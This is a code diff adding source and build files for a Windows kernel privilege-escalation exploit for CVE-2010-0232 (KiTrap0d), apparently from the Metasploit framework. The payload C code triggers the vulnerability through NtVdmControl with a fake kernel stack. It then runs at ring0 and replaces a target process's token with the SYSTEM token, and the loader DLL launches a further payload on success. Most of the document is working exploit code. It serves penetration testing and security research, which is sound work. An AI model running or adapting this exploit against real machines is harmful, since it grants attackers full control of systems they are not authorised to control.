+			// The exploit thread reports it didn't work.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to map the virtual 8086 address space", dwExitCode);
+		case 'VDMC':
+			// NtVdmControl() must be initialised before you can begin vm86 execution, but it failed.
+			// It's entirely undocumented, so you'll have to use kd to step through it and find out why
+			// it's failing.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports NtVdmControl() failed", dwExitCode);
+		case 'LPID':
+			// This exploit will try to transplant the token from PsInitialSystemProcess on to an
+			// unprivileged process owned by you.
+			// PsLookupProcessByProcessId() failed when trying to find your process.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports that PsLookupProcessByProcessId() failed", dwExitCode);
+		case FALSE:
+			// This probably means LoadLibrary() failed, perhaps the exploit dll could not be found?
+			// Verify the vdmexploit.dll file exists, is readable and is in a suitable location.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to load the injected dll", dwExitCode);
+		case 'w00t':
+			// This means the exploit payload was executed at ring0 and succeeded.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports exploitation was successful", ERROR_SUCCESS);
+		default:
+			// Unknown error. Sorry, you're on your own.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread returned an unexpected error. ", dwExitCode);
+		}
+
+	} while (0);
+
+	if (hVdm)
+	{
+		TerminateProcess(hVdm, 0);
+		CloseHandle(hVdm);
+	}
+
+	if (hThread)
+	{
+		CloseHandle(hThread);
+	}
+
+	// if we succeeded, we need to run our payload in another thread.
+	if (dwResult == ERROR_SUCCESS) {
+		CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
+	}
+
+	return dwResult;
+}
+
+/*!
+ * @brief Entry point to the exploit DLL.
+ * @param hinstDLL Reference to the DLL's module.
+ * @param dwReason The reason code for the invocation.
+ * @param lpReserved A reserved value, used by the exploit code.
+ *                     - \c RUN_EXPLOIT_KITRAP0D - Execute the KiTrap0d exploit.
+ * @returns \c TRUE all the time.
+ * @remark The \c lpReserved value contains a number which identifies which
+ *         exploit to invoke. This needs to be passed in from MSF, otherwise
+ *         no exploit funtionality will be invoked.
+ */
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	DWORD dwExploit = 0;
+	BOOL bReturnValue = TRUE;
+
+	switch (dwReason)
+	{
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		elevate_via_exploit_kitrap0d(hinstDLL, lpReserved);
+		break;
+	case DLL_QUERY_HMODULE:
+		if (lpReserved != NULL) {
+			*(HMODULE *)lpReserved = hAppInstance;
+		}
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return bReturnValue;
+}

external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj

@@ -0,0 +1,145 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{6B678096-E18A-427A-A8A3-C268AD2E12B8}</ProjectGuid>
+    <RootNamespace>kitrap0d</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+    <GenerateManifest>false</GenerateManifest>
+    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
+    <CodeAnalysisRules />
+    <CodeAnalysisRuleAssemblies />
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+    </PostBuildEvent>
+    <ResourceCompile>
+      <PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ResourceCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
+      <IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\kitrap0d.map</MapFileName>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>
+      </DataExecutionPrevention>
+      <ImportLibrary>$(OutDir)\kitrap0d.lib</ImportLibrary>
+      <TargetMachine>MachineX86</TargetMachine>
+      <Profile>false</Profile>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="..\common\LoadLibraryR.c" />
+    <ClCompile Include="..\common\ResourceLoader.c" />
+    <ClCompile Include="kitrap0d.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="..\common\common.h" />
+    <ClInclude Include="..\common\LoadLibraryR.h" />
+    <ClInclude Include="..\common\ResourceLoader.h" />
+    <ClInclude Include="resource.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="kitrap0d.rc" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>

external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters

@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <ClCompile Include="kitrap0d.c" />
+    <ClCompile Include="..\common\LoadLibraryR.c">
+      <Filter>common</Filter>
+    </ClCompile>
+    <ClCompile Include="..\common\ResourceLoader.c">
+      <Filter>common</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="resource.h" />
+    <ClInclude Include="..\common\common.h">
+      <Filter>common</Filter>
+    </ClInclude>
+    <ClInclude Include="..\common\LoadLibraryR.h">
+      <Filter>common</Filter>
+    </ClInclude>
+    <ClInclude Include="..\common\ResourceLoader.h">
+      <Filter>common</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="kitrap0d.rc" />
+  </ItemGroup>
+  <ItemGroup>
+    <Filter Include="common">
+      <UniqueIdentifier>{cbb362dd-4029-4348-86d3-62c4b22c742d}</UniqueIdentifier>
+    </Filter>
+  </ItemGroup>
+</Project>

external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d.c

@@ -0,0 +1,368 @@
+/*!
+ * @file kitrap0d.c
+ * @brief A port of HDM's/Pusscat's implementation of Tavis Ormandy's code (vdmallowed.c).
+ * @remark See http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
+ */
+
+#ifndef WIN32_NO_STATUS
+# define WIN32_NO_STATUS
+#endif
+#include <windows.h>
+#include <stdio.h>
+#include "../common/common.h"
+#include "kitrap0d.h"
+#include <winerror.h>
+#include <winternl.h>
+#include <stddef.h>
+#ifdef WIN32_NO_STATUS
+# undef WIN32_NO_STATUS
+#endif
+#include <ntstatus.h>
+
+#ifdef _WIN64
+
+/*
+ * This is not implemented for the x64 build.
+ */
+VOID elevator_kitrap0d( DWORD dwProcessId, DWORD dwKernelBase, DWORD dwOffset )
+{
+	return;
+}
+
+#else
+
+/*! * @brief Global target process ID. */
+static DWORD dwTargetProcessId      = 0;
+/*! * @brief Global pointer to the kernel stack. */
+static DWORD * lpKernelStackPointer = NULL;
+/*! * @brief Global reference to the kernel itself. */
+static HMODULE hKernel              = NULL;
+
+/*!
+ * @brief Find an exported kernel symbol by name.
+ * @param SymbolName The name of the symbol to find.
+ * @returns Pointer to the symbol, if found.
+ */
+PVOID elevator_kitrap0d_kernelgetproc(PSTR SymbolName)
+{
+	PUCHAR ImageBase = NULL;
+	PULONG NameTable = NULL;
+	PULONG FunctionTable = NULL;
+	PUSHORT OrdinalTable = NULL;
+	PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
+	PIMAGE_DOS_HEADER DosHeader = NULL;
+	PIMAGE_NT_HEADERS PeHeader = NULL;
+	DWORD i = 0;
+
+	ImageBase = (PUCHAR)hKernel;
+	DosHeader = (PIMAGE_DOS_HEADER)ImageBase;
+	PeHeader = (PIMAGE_NT_HEADERS)(ImageBase + DosHeader->e_lfanew);
+	ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(ImageBase + PeHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
+
+	// Find required tables from the ExportDirectory...
+	NameTable = (PULONG)(ImageBase + ExportDirectory->AddressOfNames);
+	FunctionTable = (PULONG)(ImageBase + ExportDirectory->AddressOfFunctions);
+	OrdinalTable = (PUSHORT)(ImageBase + ExportDirectory->AddressOfNameOrdinals);
+
+	// Scan each entry for a matching name.
+	for (i = 0; i < ExportDirectory->NumberOfNames; i++)
+	{
+		PCHAR Symbol = ImageBase + NameTable[i];
+
+		if (strcmp(Symbol, SymbolName) == 0)
+		{
+			// Symbol found, return the appropriate entry from FunctionTable.
+			return (PVOID)(ImageBase + FunctionTable[OrdinalTable[i]]);
+		}
+	}
+
+	// Symbol not found, this is likely fatal :-(
+	return NULL;
+}
+
+/*!
+ * @brief Replace a value if it falls between a given range.
+ */
+BOOL elevator_kitrap0d_checkandreplace(PDWORD checkMe, DWORD rangeStart, DWORD rangeEnd, DWORD value)
+{
+	if (*checkMe >= rangeStart && *checkMe <= rangeEnd)
+	{
+		*checkMe = value;
+		return TRUE;
+	}
+
+	return FALSE;
+}
+
+/*!
+ * @brief Search the specified data structure for a member with CurrentValue.
+ */
+BOOL elevator_kitrap0d_findandreplace( PDWORD Structure, DWORD CurrentValue, DWORD NewValue, DWORD MaxSize, BOOL ObjectRefs)
+{
+	DWORD i    = 0;
+	DWORD Mask = 0;
+
+	// Microsoft QWORD aligns object pointers, then uses the lower three
+	// bits for quick reference counting (nice trick).
+	Mask = ObjectRefs ? ~7 : ~0;
+
+	// Mask out the reference count.
+	CurrentValue &= Mask;
+
+	// Scan the structure for any occurrence of CurrentValue.
+	for( i = 0 ; i < MaxSize ; i++ )
+	{
+		if( (Structure[i] & Mask) == CurrentValue )
+		{
+			// And finally, replace it with NewValue.
+			Structure[i] = NewValue;
+			return TRUE;
+		}
+	}
+
+	// Member not found.
+	return FALSE;
+}
+
+/*!
+ * @brief This routine is where we land after successfully triggering the vulnerability.
+ */
+#pragma warning(disable: 4731)
+VOID elevator_kitrap0d_firststage(VOID)
+{
+	FARPROC DbgPrint = NULL;
+	FARPROC PsGetCurrentThread = NULL;
+	FARPROC PsGetCurrentThreadStackBase = NULL;
+	FARPROC PsGetCurrentThreadStackLimit = NULL;
+	FARPROC PsLookupProcessByProcessId = NULL;
+	FARPROC PsReferencePrimaryToken = NULL;
+	FARPROC ZwTerminateProcess = NULL;
+	PVOID CurrentThread = NULL;
+	PVOID TargetProcess = NULL;
+	PVOID * PsInitialSystemProcess = NULL;
+	HANDLE pret = NULL;
+	DWORD StackBase = 0;
+	DWORD StackLimit = 0;
+	DWORD NewStack = 0;
+	DWORD i = 0;
+	DWORD dwEThreadOffsets[] = {
+		0x6, // WinXP SP3, VistaSP2
+		0xA	 // Windows 7, VistaSP1
+	};
+
+	// Keep interrupts off until we've repaired the KTHREAD.
+	__asm cli
+
+	// Resolve some routines we need from the kernel export directory
+	DbgPrint = elevator_kitrap0d_kernelgetproc("DbgPrint");
+	PsGetCurrentThread = elevator_kitrap0d_kernelgetproc("PsGetCurrentThread");
+	PsGetCurrentThreadStackBase = elevator_kitrap0d_kernelgetproc("PsGetCurrentThreadStackBase");
+	PsGetCurrentThreadStackLimit = elevator_kitrap0d_kernelgetproc("PsGetCurrentThreadStackLimit");
+	PsInitialSystemProcess = elevator_kitrap0d_kernelgetproc("PsInitialSystemProcess");
+	PsLookupProcessByProcessId = elevator_kitrap0d_kernelgetproc("PsLookupProcessByProcessId");
+	PsReferencePrimaryToken = elevator_kitrap0d_kernelgetproc("PsReferencePrimaryToken");
+	ZwTerminateProcess = elevator_kitrap0d_kernelgetproc("ZwTerminateProcess");
+
+	CurrentThread = (PVOID)PsGetCurrentThread();
+	StackLimit = (DWORD)PsGetCurrentThreadStackLimit();
+	StackBase = (DWORD)PsGetCurrentThreadStackBase();
+
+	NewStack = StackBase - ((StackBase - StackLimit) / 2);
+
+	// First we need to repair the CurrentThread, find all references to the fake kernel
+	// stack and repair them. Note that by "repair" we mean randomly point them
+	// somewhere inside the real stack.
+
+	// Walk only the offsets that could possibly be bad based on testing, and see if they need
+	// to be swapped out.  O(n^2) -> O(c) wins the race!
+	for (i = 0; i < sizeof(dwEThreadOffsets) / sizeof (DWORD); i++) {
+		elevator_kitrap0d_checkandreplace((((PDWORD)CurrentThread) + dwEThreadOffsets[i]), (DWORD)&lpKernelStackPointer[0], (DWORD)&lpKernelStackPointer[KSTACKSIZE - 1], (DWORD)NewStack);
+	}
+
+	// Find the EPROCESS structure for the process we want to escalate
+	if (PsLookupProcessByProcessId(dwTargetProcessId, &TargetProcess) == STATUS_SUCCESS)
+	{
+		PACCESS_TOKEN SystemToken = NULL;
+		PACCESS_TOKEN TargetToken = NULL;
+
+		// What's the maximum size the EPROCESS structure is ever likely to be?
+		CONST DWORD MaxExpectedEprocessSize = 0x200;
+
+		// DbgPrint("PsLookupProcessByProcessId(%u) => %p\n", TargetPid, TargetProcess);
+		//DbgPrint("PsInitialSystemProcess @%p\n", *PsInitialSystemProcess);
+
+		// Find the Token object for my target process, and the SYSTEM process.
+		TargetToken = (PACCESS_TOKEN)PsReferencePrimaryToken(TargetProcess);
+
+		SystemToken = (PACCESS_TOKEN)PsReferencePrimaryToken(*PsInitialSystemProcess);
+
+		//DbgPrint("PsReferencePrimaryToken(%p) => %p\n", TargetProcess, TargetToken);
+		//DbgPrint("PsReferencePrimaryToken(%p) => %p\n", *PsInitialSystemProcess, SystemToken);
+
+		// Find the token in the target process, and replace with the system token.
+		elevator_kitrap0d_findandreplace((PDWORD)TargetProcess, (DWORD)TargetToken, (DWORD)SystemToken, MaxExpectedEprocessSize, TRUE);
+
+		// Success
+		pret = (HANDLE)'w00t';
+	}
+	else
+	{
+		// Maybe the user closed the window?
+		// Report this failure
+		pret = (HANDLE)'LPID';
+	}
+
+	__asm
+	{
+		mov eax, -1   // ZwCurrentProcess macro returns -1
+		mov ebx, NewStack
+		mov ecx, pret
+		mov edi, ZwTerminateProcess
+		mov esp, ebx  // Swap the stack back to kernel-land
+		mov ebp, ebx  // Swap the frame pointer back to kernel-land
+		sub esp, 256
+		push ecx      // Push the return code
+		push eax      // Push the process handle
+		sti           // Restore interrupts finally
+		call edi      // Call ZwTerminateProcess
+		__emit 0xCC;  // Hope we never end up here
+	};
+
+}
+#pragma warning(default: 4731)
+
+/*!
+ * @brief Setup a minimal execution environment to satisfy NtVdmControl().
+ */
+BOOL elevator_kitrap0d_initvdmsubsystem(VOID)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	FARPROC pNtAllocateVirtualMemory = NULL;
+	FARPROC pNtFreeVirtualMemory = NULL;
+	FARPROC pNtVdmControl = NULL;
+	PBYTE BaseAddress = (PVOID)0x00000001;
+	HMODULE hNtdll = NULL;
+	ULONG RegionSize = 0;
+	static DWORD TrapHandler[128] = { 0 };
+	static DWORD IcaUserData[128] = { 0 };
+
+	static struct {
+		PVOID TrapHandler;
+		PVOID IcaUserData;
+	} InitData;
+
+	do
+	{
+		hNtdll = GetModuleHandle("ntdll");
+		if (!hNtdll) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevator_kitrap0d_initvdmsubsystem. GetModuleHandle ntdll failed", ERROR_INVALID_PARAMETER);
+		}
+
+		pNtAllocateVirtualMemory = GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
+		pNtFreeVirtualMemory = GetProcAddress(hNtdll, "NtFreeVirtualMemory");
+		pNtVdmControl = GetProcAddress(hNtdll, "NtVdmControl");
+
+		if (!pNtAllocateVirtualMemory || !pNtFreeVirtualMemory || !pNtVdmControl) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevator_kitrap0d_initvdmsubsystem. invalid params", ERROR_INVALID_PARAMETER);
+		}
+
+		InitData.TrapHandler = TrapHandler;
+		InitData.IcaUserData = IcaUserData;
+
+		// Remove anything currently mapped at NULL
+		pNtFreeVirtualMemory(GetCurrentProcess(), &BaseAddress, &RegionSize, MEM_RELEASE);
+
+		BaseAddress = (PVOID)0x00000001;
+		RegionSize = (ULONG)0x00100000;
+
+		// Allocate the 1MB virtual 8086 address space.
+		if (pNtAllocateVirtualMemory(GetCurrentProcess(), &BaseAddress, 0, &RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevator_kitrap0d_initvdmsubsystem. NtAllocateVirtualMemory failed", 'NTAV');
+		}
+
+		// Finalise the initialisation.
+		if (pNtVdmControl(VdmInitialize, &InitData) != STATUS_SUCCESS) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevator_kitrap0d_initvdmsubsystem. NtVdmControl failed", 'VDMC');
+		}
+
+		return TRUE;
+
+	} while (0);
+
+	ExitThread(dwResult);
+
+	return FALSE;
+}
+
+/*!
+ * @brief CVE-2010-0232 implementation.
+ */
+VOID elevator_kitrap0d(DWORD dwProcessId, DWORD dwKernelBase, DWORD dwOffset)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	FARPROC pNtVdmControl = NULL;
+	HMODULE hNtdll = NULL;
+	DWORD dwKernelStack[KSTACKSIZE] = { 0 };
+	VDMTIB VdmTib = { 0 };
+	DWORD dwMinimumExpectedVdmTibSize = 0x200;
+	DWORD dwMaximumExpectedVdmTibSize = 0x800;
+
+	do
+	{
+		dprintf("[KITRAP0D] elevator_kitrap0d. dwProcessId=%d, dwKernelBase=0x%08X, dwOffset=0x%08X", dwProcessId, dwKernelBase, dwOffset);
+
+		memset(&VdmTib, 0, sizeof(VDMTIB));
+		memset(&dwKernelStack, 0, KSTACKSIZE * sizeof(DWORD));
+
+		// XXX: Windows 2000 forces the thread to exit with 0x80 if Padding3 is filled with junk.
+		//      With a buffer full of NULLs, the exploit never finds the right size.
+		//      This will require a more work to resolve, for just keep the padding zero'd
+
+		hNtdll = GetModuleHandle("ntdll");
+		if (!hNtdll) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevator_kitrap0d. GetModuleHandle ntdll failed", ERROR_INVALID_PARAMETER);
+		}
+
+		pNtVdmControl = GetProcAddress(hNtdll, "NtVdmControl");
+		if (!pNtVdmControl) {
+			BREAK_ON_ERROR("[KITRAP0D] elevator_kitrap0d. GetProcAddress NtVdmControl failed");
+		}
+
+		dwTargetProcessId = dwProcessId;
+
+		// Setup the fake kernel stack, and install a minimal VDM_TIB...
+		lpKernelStackPointer = (DWORD *)&dwKernelStack;
+		dwKernelStack[0] = (DWORD)&dwKernelStack[8];            // ESP
+		dwKernelStack[1] = (DWORD)NtCurrentTeb();               // TEB
+		dwKernelStack[2] = (DWORD)NtCurrentTeb();               // TEB
+		dwKernelStack[7] = (DWORD)elevator_kitrap0d_firststage; // RETURN ADDRESS
+		hKernel = (HMODULE)dwKernelBase;
+		VdmTib.Size = dwMinimumExpectedVdmTibSize;
+		*NtCurrentTeb()->Reserved4 = &VdmTib;
+
+		// Initialize the VDM Subsystem...
+		elevator_kitrap0d_initvdmsubsystem();
+
+		VdmTib.Size = dwMinimumExpectedVdmTibSize;
+		VdmTib.VdmContext.SegCs = 0x0B;
+		VdmTib.VdmContext.Esi = (DWORD)&dwKernelStack;
+		VdmTib.VdmContext.Eip = dwKernelBase + dwOffset;
+		VdmTib.VdmContext.EFlags = EFLAGS_TF_MASK;
+		*NtCurrentTeb()->Reserved4 = &VdmTib;
+
+		// Allow thread initialization to complete. Without is, there is a chance
+		// of a race in KiThreadInitialize's call to SwapContext
+		Sleep(1000);
+
+		// Trigger the vulnerable code via NtVdmControl()...
+		while (VdmTib.Size++ < dwMaximumExpectedVdmTibSize) {
+			pNtVdmControl(VdmStartExecution, NULL);
+		}
+
+	} while (0);
+
+	// Unable to find correct VdmTib size.
+	ExitThread('VTIB');
+}
+
+#endif

external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d.h

@@ -0,0 +1,34 @@
+/*!
+ * @file kitrap0d.h
+ */
+
+#ifndef _METERPRETER_SOURCE_ELEVATOR_KITRAP0D_H
+#define _METERPRETER_SOURCE_ELEVATOR_KITRAP0D_H
+
+#define KSTACKSIZE		1024
+
+#define EFLAGS_TF_MASK	0x00000100 // trap flag
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE		0x1000
+#endif
+
+enum
+{ 
+	VdmStartExecution = 0,
+	VdmInitialize     = 3
+};
+
+typedef struct _VDMTIB
+{
+	ULONG   Size;
+	PVOID   Padding0;
+	PVOID   Padding1;
+	CONTEXT Padding2;
+	CONTEXT VdmContext;
+	DWORD   Padding3[1024];
+} VDMTIB, * LPVDMTIB;
+
+VOID elevator_kitrap0d( DWORD dwProcessId, DWORD dwKernelBase, DWORD dwOffset );
+
+#endif

external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj

@@ -0,0 +1,130 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}</ProjectGuid>
+    <RootNamespace>kitrap0d_payload</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+    <GenerateManifest>false</GenerateManifest>
+    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
+    <CodeAnalysisRules />
+    <CodeAnalysisRuleAssemblies />
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
